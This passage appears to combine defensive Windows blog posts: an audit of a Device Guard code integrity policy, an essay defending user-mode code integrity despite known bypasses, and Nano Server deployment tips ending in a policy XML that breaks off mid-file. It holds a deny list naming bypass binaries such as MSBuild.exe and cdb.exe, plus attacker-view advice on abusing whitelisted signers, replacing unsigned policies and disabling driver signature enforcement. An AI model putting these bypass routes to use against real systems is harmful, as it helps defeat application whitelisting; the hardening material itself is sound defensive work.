Implications: It is unlikely that the absence of this rule would lead to a code integrity bypass scenario but in the off-chance an attacker attempted to deploy an unsigned UWP application, Device Guard would prevent it from loading. The actual implementation of this rule is unclear to me and warrants research. For example, if you launch modern calc (Calculator.exe), it is not actually signed. There’s obviously some other layer of enforcement occurring that I don’t currently comprehend.

Note: This rule option is not actually officially documented, but it is accessible via the Set-RuleOption cmdlet.

2) Enabled:UMCI

Description: The presence of this setting indicates that user mode code integrity is to be enforced. This means that all user-mode code (exe, dll, msi, js, vbs, PowerShell) is subject to enforcement. Compiled binaries (e.g. exe, dll, msi) not conformant to policy will outright fail to load. WSH scripts (JS and VBScript) not conformant to policy will be prevented from instantiating COM objects, and PowerShell scripts/modules not conformant to policy will be placed into Constrained Language mode. The absence of this rule implies that the code integrity policy will only apply to drivers.

Implications: Attackers will need to come armed with UMCI bypasses to circumvent this protection. Myself, along with Casey Smith (@subtee) and Matt Nelson (@enigma0x3), have been doing a lot of research lately in developing UMCI bypasses. To date, we’ve discussed some of these bypasses publicly. As of this writing, we also have several open cases with MSRC addressing many more UMCI issues. Our research has focused on discovering trusted binaries that allow us to execute unsigned code, Device Guard implementation flaws, and PowerShell Constrained Language mode bypasses. We hope to see fixes implemented for all the issues we reported.

Attackers seeking to circumvent Device Guard should be aware of UMCI bypasses as this is often the easiest way to circumvent a Device Guard deployment.

3) Required:WHQL

Description: All drivers must be WHQL signed as indicated by a "Windows Hardware Driver Verification" EKU (1.3.6.1.4.1.311.10.3.5) in their certificate.

Implications: This setting raises the bar for trust and integrity of the drivers that are allowed to load.

4) Disabled:Flight Signing

Description: Flight signed code will be prevented from loading. This should only affect the loading of Windows Insider Preview code.

Implications: It is recommended that this setting be enabled. This will preclude you from running Insider Preview builds, however. Flight signed code does not go through the rigorous testing that code for a general availability release would go through (I say so speculatively).

5) Enabled:Unsigned System Integrity Policy

Description: This setting indicates that Device Guard does not require that the code integrity policy be signed. Code integrity policy signing is a very effective mitigation against CI policy tampering, as it ensures that only code signing certificates included in the UpdatePolicySigners section are authorized to make CI policy changes.

Implications: An attacker would need to steal one of the approved code signing certificates to make changes; therefore, it is critical that these code signing certificates be well protected. It should go without saying that the certificate used to sign a policy should not be present on a system where the code integrity policy is deployed. More generally, no code signing certificates that are whitelisted per policy should be present on any Device Guard protected system.

6) Enabled:Advanced Boot Options Menu

Description: By default, with a code integrity policy deployed, the advanced boot options menu is disabled. The presence of this rule indicates that a user with physical access can access the menu.

Implications: An attacker with physical access will have the ability to remove deployed code integrity policies. If this is a realistic threat for you, then it is critical that BitLocker be deployed and a UEFI password be set. Additionally, since the “Enabled:Unsigned System Integrity Policy” option is set, an attacker could simply replace the existing, deployed code integrity policy with one of their own that permits their code to execute.

Analysis/recommendations: Policy Rules


After thorough testing has been performed, I would recommend the following:
  1. Remove "Enabled:Unsigned System Integrity Policy" and to sign the policy. This is an extremely effective way to prevent policy tampering.
  2. Remove "Enabled:Advanced Boot Options Menu". This is an effective mitigation against certain physical attacks.
  3. If possible, enable "Required:EV Signers". This is likely not feasible, however, since it is unlikely that all required drivers will be EV signed.

SigningScenario analysis

At this point, we’re interested in identifying what is whitelisted and what is blacklisted. The most efficient place to start is by analyzing the SigningScenarios section and working our way backwards.

There will only ever be at most two SigningScenarios:

  • ID_SIGNINGSCENARIO_DRIVERS_1 - these rules only apply to drivers
  • ID_SIGNINGSCENARIO_WINDOWS - these rules only apply to user mode code

ID_SIGNINGSCENARIO_DRIVERS_1


The following driver signers are whitelisted:

- ID_SIGNER_S_1_0_0_0_0_0_0_0
  Name: Microsoft Windows Production PCA 2011
  TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_AE_0_0_0_0_0_0_0
  Name: Intel External Basic Policy CA
  TBS: 53B052BA209C525233293274854B264BC0F68B73
- ID_SIGNER_S_AF_0_0_0_0_0_0_0
  Name: Microsoft Windows Third Party Component CA 2012
  TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_17C_0_0_0_0_0_0_0
  Name: COMODO RSA Certification Authority
  TBS: 7CE102D63C57CB48F80A65D1A5E9B350A7A618482AA5A36775323CA933DDFCB00DEF83796A6340DEC5EBF7596CFD8E5D
- ID_SIGNER_S_18D_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA 2010
  TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2E0_0_0_0_0_0_0_0
  Name: VeriSign Class 3 Code Signing 2010 CA
  TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
- ID_SIGNER_S_34C_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA
  TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_34F_0_0_0_0_0_0_0
  Name: Microsoft Code Signing PCA 2011
  TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_37B_0_0_0_0_0_0_0
  Name: Microsoft Root Certificate Authority
  TBS: 391BE92883D52509155BFEAE27B9BD340170B76B
- ID_SIGNER_S_485_0_0_0_0_0_0_0
  Name: Microsoft Windows Verification PCA
  TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918

TBS description:

The "Name" attribute is derived from the CN of the certificate. Ultimately, Device Guard doesn't validate the CN. In fact, the "Name" attribute is not present in a binary CI policy (i.e. SIPolicy.p7b). Rather, it validates the TBS (ToBeSigned) hash which is basically a hash of the certificate as dictated by the signature algorithm in the certificate (MD5, SHA1, SHA256, SHA384, SHA512). You can infer the hash algorithm used based on the length of the hash. If you're interested to learn how the hash is calculated, I recommend you load Microsoft.Config.CI.Commands.dll in a decompiler and inspect the Microsoft.SecureBoot.UserConfig.Helper.CalculateTBS method.

Signer hashing algorithms used:

SHA1:
 * Intel External Basic Policy CA
 * VeriSign Class 3 Code Signing 2010 CA
 * Microsoft Code Signing PCA
 * Microsoft Root Certificate Authority
 * Microsoft Windows Verification PCA

Note: Microsoft advises against using a SHA1 signature algorithm and is phasing the algorithm out for certificates. See https://aka.ms/sha1. It is within the realm of possibility that even a non-state actor could generate a certificate with a SHA1 hash collision.

SHA256:
 * Microsoft Windows Production PCA 2011
 * Microsoft Windows Third Party Component CA 2012
 * Microsoft Code Signing PCA 2010
 * Microsoft Code Signing PCA 2011

SHA384:
 * COMODO RSA Certification Authority

Analysis/recommendations: Driver rules


Overall, I would say the driver rules may be overly permissive. First of all, any driver signed with any of those certificates would be permitted to load. For example, I would imagine that most, if not all, Intel drivers are signed with the same certificate. So, if there were a vulnerable driver that had no business on your system, it could be loaded and exploited to gain unsigned kernel code execution. My recommendation for third party driver certificates is that you whitelist each individual required third party driver using the FilePublisher or preferably the WHQLFilePublisher (if the driver happens to be WHQL signed) file rule level. An added benefit of the FilePublisher rule is that the whitelisted driver will only load if its file version is equal to or greater than what is specified. This means that if there is an older, known vulnerable version of the driver you need, the old version will not be authorized to load.

Another potential issue that I could speculatively anticipate is with the "Microsoft Windows Third Party Component CA 2012" certificate. My understanding is that this certificate is used by Microsoft to co-sign 3rd party software. Because this certificate seems to be used so heavily by 3rd party vendors, it potentially opens the door to a large amount of vulnerable software. To mitigate this, you can use the WHQLPublisher or WHQLFilePublisher rule level when creating a code integrity policy. When those options are selected, if an OEM vendor name is associated with a driver, a CertOemID attribute will be applied to signers. For example, you could use this feature to whitelist only Apple drivers that are co-signed with the "Microsoft Windows Third Party Component CA 2012" certificate.

ID_SIGNINGSCENARIO_WINDOWS


The following user-mode code signers are whitelisted (based on their presence in AllowedSigners):

- ID_SIGNER_S_1_1_0_0_0_0_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
- ID_SIGNER_S_1_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) Intel_ICG
- ID_SIGNER_S_2_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_4_1_0_0_0
   Name: Matthew Graeber
   TBS: B1554C5EEF15063880BB76B347F2215CDB5BBEFA1A0EBD8D8F216B6B93E8906A
- ID_SIGNER_S_19_1_0
   Name: Intel External Basic Policy CA
   TBS: 53B052BA209C525233293274854B264BC0F68B73
   CertPublisher: Intel(R) pGFX
- ID_SIGNER_S_20_1_0
   Name: iKGF_AZSKGFDCS
   TBS: 32656594870EFFE75251652A99B906EDB92D6BB0
   CertPublisher: IntelVPGSigning2016
- ID_SIGNER_S_4E_1_0
   Name: Microsoft Windows Third Party Component CA 2012
   TBS: CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46
- ID_SIGNER_S_65_1_0
   Name: VeriSign Class 3 Code Signing 2010 CA
   TBS: 4843A82ED3B1F2BFBEE9671960E1940C942F688D
   CertPublisher: Logitech
- ID_SIGNER_S_35C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
- ID_SIGNER_S_35F_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
- ID_SIGNER_S_1EA5_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
- ID_SIGNER_S_2316_1_0_0_0_0_0_0
   Name: Microsoft Windows Verification PCA
   TBS: 265E5C02BDC19AA5394C2C3041FC2BD59774F918
- ID_SIGNER_S_3D8C_1_0_0_0_0_0_0
   Name: Microsoft Code Signing PCA
   TBS: 7251ADC0F732CF409EE462E335BB99544F2DD40F

The following user-mode code blacklist rules are present (based on their presence in DeniedSigners):

- ID_SIGNER_F_1_0_0_1_0_0
   Name: Microsoft Code Signing PCA
   TBS: 27543A3F7612DE2261C7228321722402F63A07DE
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
     4) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_2_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2010
   TBS: 121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: cdb.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: kd.exe
        MinimumFileVersion: 99.0.0.0
     3) OriginalFileName: windbg.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_3_0_0_1_0_0
   Name: Microsoft Code Signing PCA 2011
   TBS: F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E
   CertPublisher: Microsoft Corporation
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0
     2) OriginalFileName: csi.exe
        MinimumFileVersion: 99.0.0.0
- ID_SIGNER_F_4_0_0_1_0_0
   Name: Microsoft Windows Production PCA 2011
   TBS: 4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146
   CertPublisher: Microsoft Windows
   Associated files:
     1) OriginalFileName: MSBuild.exe
        MinimumFileVersion: 99.0.0.0

Analysis/recommendations: User-mode rules

Whoever created this policy is clearly mindful of and actively blocking known UMCI bypasses. The downside is that there have since been additional bypasses reported publicly - e.g. dnx.exe from Matt Nelson (@enigma0x3). As a defender employing application whitelisting solutions, it is critical to stay up to date on current bypasses. If not, you're potentially one trusted binary/script away from further compromise.

You may have noticed what seems like an arbitrary selection of "99.0.0.0" for the minimum file version. You can interpret this as follows: any file matching a block rule with a version number less than 99.0.0.0 will be blocked. It is fairly reasonable to assume that a binary won't exceed version 99.0.0.0, but I've recently seen several files with versions in the hundreds, so I now recommend setting MinimumFileVersion for each FilePublisher block rule to 999.999.999.999. Unfortunately, at the time of writing, you cannot block an executable by only its signature and OriginalFileName. I hope this will change in the future.

As for the whitelisted signers, I don't have a ton to recommend. As an attacker though, I might try to find executables/scripts signed with the "Matthew Graeber" certificate. This sounds like it would be an easy thing to do, but Microsoft does not actually provide an official means of associating an executable or script with a CI policy rule. Ideally, Microsoft would provide a Test-CIPolicy cmdlet similar to the Test-AppLockerPolicy cmdlet. I'm in the process of writing one now.
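
In the meantime, a crude way to approximate that hunt is to brute-force scan for PEs whose leaf certificate matches a whitelisted publisher. This is a rough sketch - the search root and publisher name are placeholders, and matching on the subject CN alone is weaker than a proper TBS hash comparison:

# Hunt for binaries whose Authenticode leaf certificate subject matches a target publisher
Get-ChildItem -Path 'C:\' -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | ForEach-Object {
    $Signature = Get-AuthenticodeSignature -FilePath $_.FullName
    if ($Signature.SignerCertificate.Subject -match 'Matthew Graeber') {
        $_.FullName
    }
}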

Overall, there are no signers that stick out to me as worthy of additional investigation. Obviously, Microsoft signers will need to be permitted (and in a non-restrictive fashion) if OS updates are to be accepted. It appears as though there is some required Intel software present on the system. If anything, I might try to determine why the Intel software is required.


UpdatePolicySigners analysis

There is only a single UpdatePolicySigner: "Matthew Graeber". So while the effort was made to permit that code signing certificate to sign the policy, the "Enabled:Unsigned System Integrity Policy" policy rule was still set. Considering the intent to sign the policy was there, I would certainly recommend removing the "Enabled:Unsigned System Integrity Policy" rule and starting to enforce signed policies. As an attacker, I would also look for the presence of this code signing certificate on the same system. It should go without saying that a whitelisted code signing certificate should never be present on a Device Guard-enabled system that whitelists that certificate.
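
For reference, transitioning to an enforced, signed policy generally amounts to authorizing the signer, dropping the unsigned-policy option, converting, and signing. A rough sketch, assuming the "Matthew Graeber" certificate is exported to MGraeber.cer and its private key is available to signtool:

# Authorize the certificate to sign future policy updates
Add-SignerRule -FilePath 'FinalPolicy.xml' -CertificatePath 'MGraeber.cer' -Update

# Drop "Enabled:Unsigned System Integrity Policy" (option 6 in the ConfigCI rule option table)
Set-RuleOption -FilePath 'FinalPolicy.xml' -Option 6 -Delete

ConvertFrom-CIPolicy -XmlFilePath 'FinalPolicy.xml' -BinaryFilePath 'SIPolicy.p7b'

# Sign the binary policy on a system that holds the private key
signtool.exe sign /v /n "Matthew Graeber" /p7 . /p7co 1.3.6.1.4.1.311.79.1 /fd sha256 SIPolicy.p7b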

HvciOptions analysis

HvciOptions is set to "1", indicating that HVCI is enabled and that the system will benefit from additional kernel exploitation protections. I cannot yet recommend setting HVCI to strict mode (3), as it is almost certain that some drivers will not be compliant with strict mode.
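
As an aside, on systems that expose the Device Guard WMI provider, VBS/HVCI status can be validated at runtime. A minimal check:

# Query VBS/HVCI status; SecurityServicesRunning contains 2 when HVCI is active
Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName 'Win32_DeviceGuard' |
    Select-Object -Property VirtualizationBasedSecurityStatus, SecurityServicesConfigured, SecurityServicesRunning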

Conclusion

I'll state again that this analysis has been subjective. An effective policy on one system with a particular purpose likely won't be effective on another piece of hardware with a separate purpose. Getting CI policy configuration "right" is indeed a challenge. It takes experience and knowledge of the CI policy schema, and it requires that you apply an attacker's mindset when auditing a policy.

It is worth noting that even with an extremely locked down policy, the OS is still at the mercy of UMCI bypasses. For this very reason, Device Guard should be merely one component of a layered defense. It is certainly recommended that anti-malware solutions be installed side by side with Device Guard. For example, in a post-exploitation scenario, Device Guard will do nothing about the exfiltration of sensitive data using a simple batch script or a PowerShell script operating in constrained language mode.

I will leave the comments section open to encourage discussion about your thoughts on CI policy assessment and how you think this example policy might have additional vulnerabilities. I feel as though I'm breaking new ground here since there is no other information available regarding Device Guard policy audit methodology so I am certainly open to candid feedback.

On the Effectiveness of Device Guard User Mode Code Integrity

23 November 2016 at 00:19
Is a security feature with known bypasses pointless?

I felt compelled to answer this question after seeing several tweets recently claiming that Device Guard User Mode Code Integrity (UMCI) is a pointless security mechanism considering all of the recently reported bypasses. Before diving into UMCI and its merits (or lack thereof), let's use an analogy in the physical world to put things into perspective - a door.

Consider the door at the front of your home or business. This door helps serve as the primary mechanism to prevent intruders from breaking, entering, and stealing your assets. Let's say it's a solid wood door for the sake of the analogy. How might an attacker go about bypassing it?

  • They could pick the lock
  • They could compromise the latch with a shimming device
  • They could chop the door down with an ax
  • They could compromise the door and the hinges with a battering ram

Now, there are certainly better doors out there. You could purchase a blast door and have it be monitored with a 24/7 armed guard. Is that measure realistic? Maybe. It depends on the value of the assets you want to protect. Realistically, it's probably not worth your money since you suspect that a full frontal assault of enemy tanks is not a part of your threat model.

Does a determined attacker ultimately view the door as a means of preventing them from gaining access to your valuable assets? Of course not. Does the attacker even need to bypass the door? Probably not. They could also:

  • Go through the window
  • Break through a wall
  • Hide in the store during business hours and wait for everyone to leave
  • Submit their resume, get a job, develop trust, and slowly, surreptitiously steal your assets

So, will a door prevent breaches in all cases? Absolutely not. Will it prevent or deter an attacker lacking a certain amount of skill from breaking and entering? Sure. Other than preventing the elements from entering your store, does the locked door serve a purpose? Of course. It is a preventative mechanism suitable for the threat model that you choose to accept or mitigate against. The door is a baseline preventative mechanism employed in conjunction with a layered defense consisting of other preventative (reinforced, locked windows) and detective (motion sensors, video cameras, etc.) measures.

Now let's get back to the comfortable world of computers. Is a preventative security technology completely pointless if there are known bypasses? Specifically, let’s focus on Device Guard user mode code integrity (UMCI) as it’s received a fair amount of attention as of late. Considering all of the public bypasses posted, does it still serve a purpose? I won't answer that question using absolutes. Let me make a few proposals and let you, the reader decide. Consider the following:

1) A bypass that applies to Device Guard UMCI is extremely likely to apply to all application whitelisting solutions. I would argue that Device Guard UMCI goes above and beyond other offerings. For example, UMCI places PowerShell (one of the largest user-mode attack surfaces) into constrained language mode, preventing PowerShell from being used to execute arbitrary, unsigned code (see the quick demonstration after this list). Other whitelisting solutions don't even consider the attack surface posed by PowerShell. Device Guard UMCI also applies code integrity rules to DLLs - there is no way around this. Other solutions allow for DLL whitelisting, but not by default.

2) Device Guard UMCI, as with any whitelisting solution, is extremely effective against post-exploitation activities that are not aware of UMCI bypasses. The sheer number of attacks that app whitelisting prevents without any fancy machine learning is astonishing. I can say first hand that nearly every piece of "APT" malware I reversed in a previous gig dropped an unsigned binary to disk. Even in the cases where PowerShell was used, .NET methods were used heavily - something that constrained language mode would have outright prevented.

3) The majority of the "misplaced trust" binaries (e.g. MSBuild.exe, cdb.exe, dnx.exe, rcsi.exe, etc.) can be blocked with Device Guard code integrity policy updates. Will there be more bypass binaries? Of course. Again, these binaries will also likely circumvent all app-whitelisting solutions as well. Does it require an active effort to stay on top of all the bypasses as a defender? Yes. Deal with it.
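
To see point #1 in action, drop into an interactive PowerShell session on a UMCI-enforced system. A session subject to the policy reports constrained language mode:

# Report the language mode of the current session
$ExecutionContext.SessionState.LanguageMode

# Expected output on a UMCI-enforced system: ConstrainedLanguage.
# In that mode, Add-Type and method calls on arbitrary .NET types fail,
# cutting off the usual unsigned code execution primitives.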

Now, I along with awesome people like Casey Smith (@subtee) and Matt Nelson (@enigma0x3) have reported our share of UMCI bypasses to Microsoft for which there is no code integrity policy mitigation. We have been in the trenches and have seen first hand just how bad some of the bypasses are. We are desperately holding out hope that Microsoft will come through, issue CVEs, and apply fixes for all of the issues we’ve reported. If they do, that will set a precedent and serve as proof that they are taking UMCI seriously. If not, I will start to empathize a bit more with those who claim that Device Guard is pointless. After all, we’re starting to see more attackers “live off the land” and leverage built-in tools to host their malware. Vendors need to be taking that seriously.

Ultimately, Device Guard UMCI is just another security feature that a defender should consider from a cost/benefit analysis based on the threats faced and the assets they need to defend. It will always be vulnerable to bypasses, but it raises the baseline bar of security. Going back to the analogy above, a door can always be bypassed, but you should be able to detect an attacker breaking in and laying their hands on your valuable assets. So obviously, you would want to use additional security solutions along with Device Guard - e.g. Windows Event Forwarding, an anti-malware solution, and periodic compromise/hunt assessments.

What I'm about to say might be scandalous, but I sincerely think that application whitelisting should be the new norm. You probably won't encounter any organization that doesn't employ an anti-malware solution despite the innumerable bypasses; anti-malware solutions are simply assumed to be a security baseline. I think whitelisting should be viewed the same way, despite the bypasses that will inevitably surface over time. Personally, I would ask any defender to seriously consider it, and I would encourage all defenders to hold whitelisting solution vendors' feet to the fire and hold them accountable when there are bypasses for which there is no obvious mitigation.


I look forward to your comments here or in a lively debate on Twitter!

Code Integrity on Nano Server: Tips/Gotchas

28 November 2016 at 15:57
Although it's not explicitly called out as being supported in Microsoft documentation, it turns out that you can deploy a code integrity policy to Nano Server, enabling enforcement of user and kernel-mode code integrity. It is refreshing to know that code integrity is now supported across all modern Windows operating systems (Win 10 Enterprise, Win 10 IoT, and Server 2016 including Nano Server), despite the fact that Microsoft doesn't make that fact well known. Now, while it is possible to enforce code integrity on Nano Server, you should be aware of some caveats, which I intend to enumerate in this post.

Code Integrity != Device Guard

Do note that until now, there has been no mention of Device Guard. This was intentional. Nano Server does not support Device Guard - only code integrity (CI), a subset of the supported Device Guard features. So what's the difference you ask?

  • There are no ConfigCI cmdlets. These cmdlets are what allow you to build code integrity policies. I'm not going to try to speculate around the rationale for not including them in Nano Server but I doubt you will ever see them. In order to build a policy, you will need to build it from a system that does have the ConfigCI cmdlets.
  • Because there are no ConfigCI cmdlets, you cannot use the -Audit parameter of Get-SystemDriver and New-CIPolicy to build a policy based on blocked binaries in the Microsoft-Windows-CodeIntegrity/Operational event log. If you want to do this (an extremely realistic scenario), you have to get comfortable pulling out and parsing blocked binary paths yourself using Get-WinEvent. When calling Get-WinEvent, you'll want to do so from an interactive PSSession rather than calling it from Invoke-Command. By default, event log properties don't get serialized and you need to access the properties to pull out file paths.
  • In order to scan files and parse Authenticode and catalog signatures, you will need to either copy the target files from a PSSession (i.e. Copy-Item -FromSession) or mount Nano Server partitions as a file share (see the sketch after this list). You will need to do the same thing with the CatRoot directory - C:\Windows\System32\CatRoot. Fortunately, Get-SystemDriver and New-CIPolicy support explicit paths via the -ScanPath and -PathToCatroot parameters. It may not be obvious, but you have to build your rules off the Nano Server catalog signers, not those of some other system, because that other system is unlikely to contain the hashes of the binaries present on Nano Server.
  • There is no Device Guard WMI provider (ROOT\Microsoft\Windows\DeviceGuard). Without this WMI class, it is difficult to audit code integrity enforcement status at scale remotely.
  • There is no Microsoft-Windows-DeviceGuard/Operational event log so there is no log to indicate when a new CI policy was deployed. This event log is useful for alerting a defender to code integrity policy and virtualization-based security (VBS) configuration tampering.
  • Since Nano Server does not have Group Policy, there is no way to configure a centralized CI policy path, VBS settings, or Credential Guard settings. I still need to dig in further to see if any of these features are even supported in Nano Server. For example, I would really want Nano Server to support UEFI CI policy protection.
  • PowerShell is not placed into constrained language mode even with user-mode code integrity (UMCI) enforcement enabled. Despite PowerShell running on .NET Core, you still have a rich reflection API to interface with Win32 - i.e. gain arbitrary unsigned code execution. With PowerShell not in constrained language mode (it's in FullLanguage mode), this means that signature validation won't be enforced on your scripts. I tried turning on constrained language mode by setting the __PSLockdownPolicy system environment variable, but PowerShell Core doesn't seem to acknowledge it. Signature enforcement of scripts/modules in PowerShell is independent of Just Enough Administration (JEA) but you should also definitely consider using JEA in Nano Server to enforce locked down remote session configurations.
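
Here is a minimal sketch of the copy-then-scan workflow referenced above. The computer name, credential, and staging paths are hypothetical:

# Pull the files to scan and the catalog store down from Nano Server
$Session = New-PSSession -ComputerName 'NanoServer' -Credential (Get-Credential)
Copy-Item -FromSession $Session -Path 'C:\Windows\System32\CatRoot' -Destination 'C:\NanoScan\CatRoot' -Recurse
Copy-Item -FromSession $Session -Path 'C:\Windows\System32\drivers' -Destination 'C:\NanoScan\Files\drivers' -Recurse

# Build rules locally against the Nano Server binaries and its catalog signers
$NanoFiles = Get-SystemDriver -ScanPath 'C:\NanoScan\Files' -PathToCatroot 'C:\NanoScan\CatRoot' -UserPEs
New-CIPolicy -FilePath 'NanoPolicy.xml' -DriverFiles $NanoFiles -Level Publisher -UserPEs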

Well then what is supported on Nano Server? Not all is lost. You still get the following:

  • The Microsoft-Windows-CodeIntegrity/Operational event log so you can view which binaries were blocked per code policy.
  • You still deploy SIPolicy.p7b to C:\Windows\System32\CodeIntegrity. When SIPolicy.p7b is present in that directory, Nano Server will begin enforcing the rules after a reboot (a deployment sketch follows this list).
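
A minimal deployment sketch over PowerShell remoting (the session and paths are assumed):

# Push the compiled policy to Nano Server and reboot to begin enforcement
$Session = New-PSSession -ComputerName 'NanoServer' -Credential (Get-Credential)
Copy-Item -ToSession $Session -Path '.\SIPolicy.p7b' -Destination 'C:\Windows\System32\CodeIntegrity\SIPolicy.p7b'
Invoke-Command -Session $Session -ScriptBlock { Restart-Computer -Force }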

Configuration/deployment/debugging tips/tricks

I wanted to share with you the way in which I dealt with some of the headaches involved in configuring, deploying, and debugging issues associated with code integrity on Nano Server.

Event log parsing

Since you don't get the -Audit parameter of the Get-SystemDriver and New-CIPolicy cmdlets, if you choose to base your policy off audit logs, you will need to pull out blocked binary paths yourself. When in audit mode, binaries that would have been blocked generate event ID 3076 events. The path of the binary is populated in the second event parameter. The paths need to be normalized and converted from the raw device path to a proper file path. Here is some sample code that I used to obtain the paths of blocked binaries from the event log:

$BlockedBinaries = Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -FilterXPath '*[System[EventID=3076]]' | ForEach-Object {
    # The second event property holds the raw device path of the blocked binary
    $UnnormalizedPath = $_.Properties[1].Value.ToLower()

    $NormalizedPath = $UnnormalizedPath

    # Normalize raw device paths to drive letter paths
    if ($UnnormalizedPath.StartsWith('\device\harddiskvolume3')) {
        $NormalizedPath = $UnnormalizedPath.Replace('\device\harddiskvolume3', 'C:')
    } elseif ($UnnormalizedPath.StartsWith('system32')) {
        $NormalizedPath = $UnnormalizedPath.Replace('system32', 'C:\windows\system32')
    }

    $NormalizedPath
} | Sort-Object -Unique


Working through boot failures

There were times when the system wouldn't boot because my kernel-mode rules were too strict in enforcement mode. For example, when I neglected to add hal.dll to the whitelist, the OS obviously wouldn't boot. While I worked through these problems, I would boot into the advanced boot options menu (by pressing F8) and disable driver signature enforcement for that session. This was an easy workaround to gain access to the system without having to boot from external WinPE media to redeploy a better, bootable CI policy. Note that the advanced boot menu is only made available to you if the "Enabled:Advanced Boot Options Menu" policy rule option is present in your CI policy. Obviously, disabling driver signature enforcement is a way to completely circumvent kernel-mode code integrity enforcement.

Completed code integrity policy

After going through many of the phases of an initial deny-all approach as described in my previous post on code integrity policy development, this is the relatively locked-down CI policy that I got to work on my Nano Server bare-metal install (an Intel NUC):

<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
  <VersionEx>1.0.0.0</VersionEx>
  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
  <Rules>
    <Rule>
      <Option>Enabled:Unsigned System Integrity Policy</Option>
    </Rule>
    <Rule>
      <Option>Enabled:Advanced Boot Options Menu</Option>
    </Rule>
    <Rule>
      <Option>Enabled:UMCI</Option>
    </Rule>
    <Rule>
      <Option>Disabled:Flight Signing</Option>
    </Rule>
  </Rules>
  <!--EKUS-->
  <EKUs />
  <!--File Rules-->
  <FileRules>
    <!--This is the only non-OEM, 3rd party driver I needed for my Intel NUC-->
    <!--I was very specific with this driver rule but flexible with all other MS drivers.-->
    <FileAttrib ID="ID_FILEATTRIB_F_1" FriendlyName="e1d64x64.sys FileAttribute" FileName="e1d64x64.sys" MinimumFileVersion="12.15.22.3" />
  </FileRules>
  <!--Signers-->
  <Signers>
    <Signer ID="ID_SIGNER_F_1" Name="Intel External Basic Policy CA">
      <CertRoot Type="TBS" Value="53B052BA209C525233293274854B264BC0F68B73" />
      <CertPublisher Value="Intel(R) INTELNPG1" />
      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />
    </Signer>
    <Signer ID="ID_SIGNER_F_2" Name="Microsoft Windows Third Party Component CA 2012">
      <CertRoot Type="TBS" Value="CEC1AFD0E310C55C1DCC601AB8E172917706AA32FB5EAF826813547FDF02DD46" />
      <CertPublisher Value="Microsoft Windows Hardware Compatibility Publisher" />
      <FileAttribRef RuleID="ID_FILEATTRIB_F_1" />
    </Signer>
    <Signer ID="ID_SIGNER_S_3" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />
      <CertPublisher Value="Microsoft Windows" />
    </Signer>
    <Signer ID="ID_SIGNER_S_4" Name="Microsoft Code Signing PCA">
      <CertRoot Type="TBS" Value="27543A3F7612DE2261C7228321722402F63A07DE" />
      <CertPublisher Value="Microsoft Corporation" />
    </Signer>
    <Signer ID="ID_SIGNER_S_5" Name="Microsoft Code Signing PCA 2011">
      <CertRoot Type="TBS" Value="F6F717A43AD9ABDDC8CEFDDE1C505462535E7D1307E630F9544A2D14FE8BF26E" />
      <CertPublisher Value="Microsoft Corporation" />
    </Signer>
    <Signer ID="ID_SIGNER_S_6" Name="Microsoft Windows Production PCA 2011">
      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />
      <CertPublisher Value="Microsoft Windows Publisher" />
    </Signer>
    <Signer ID="ID_SIGNER_S_2" Name="Microsoft Windows Production PCA 2011">
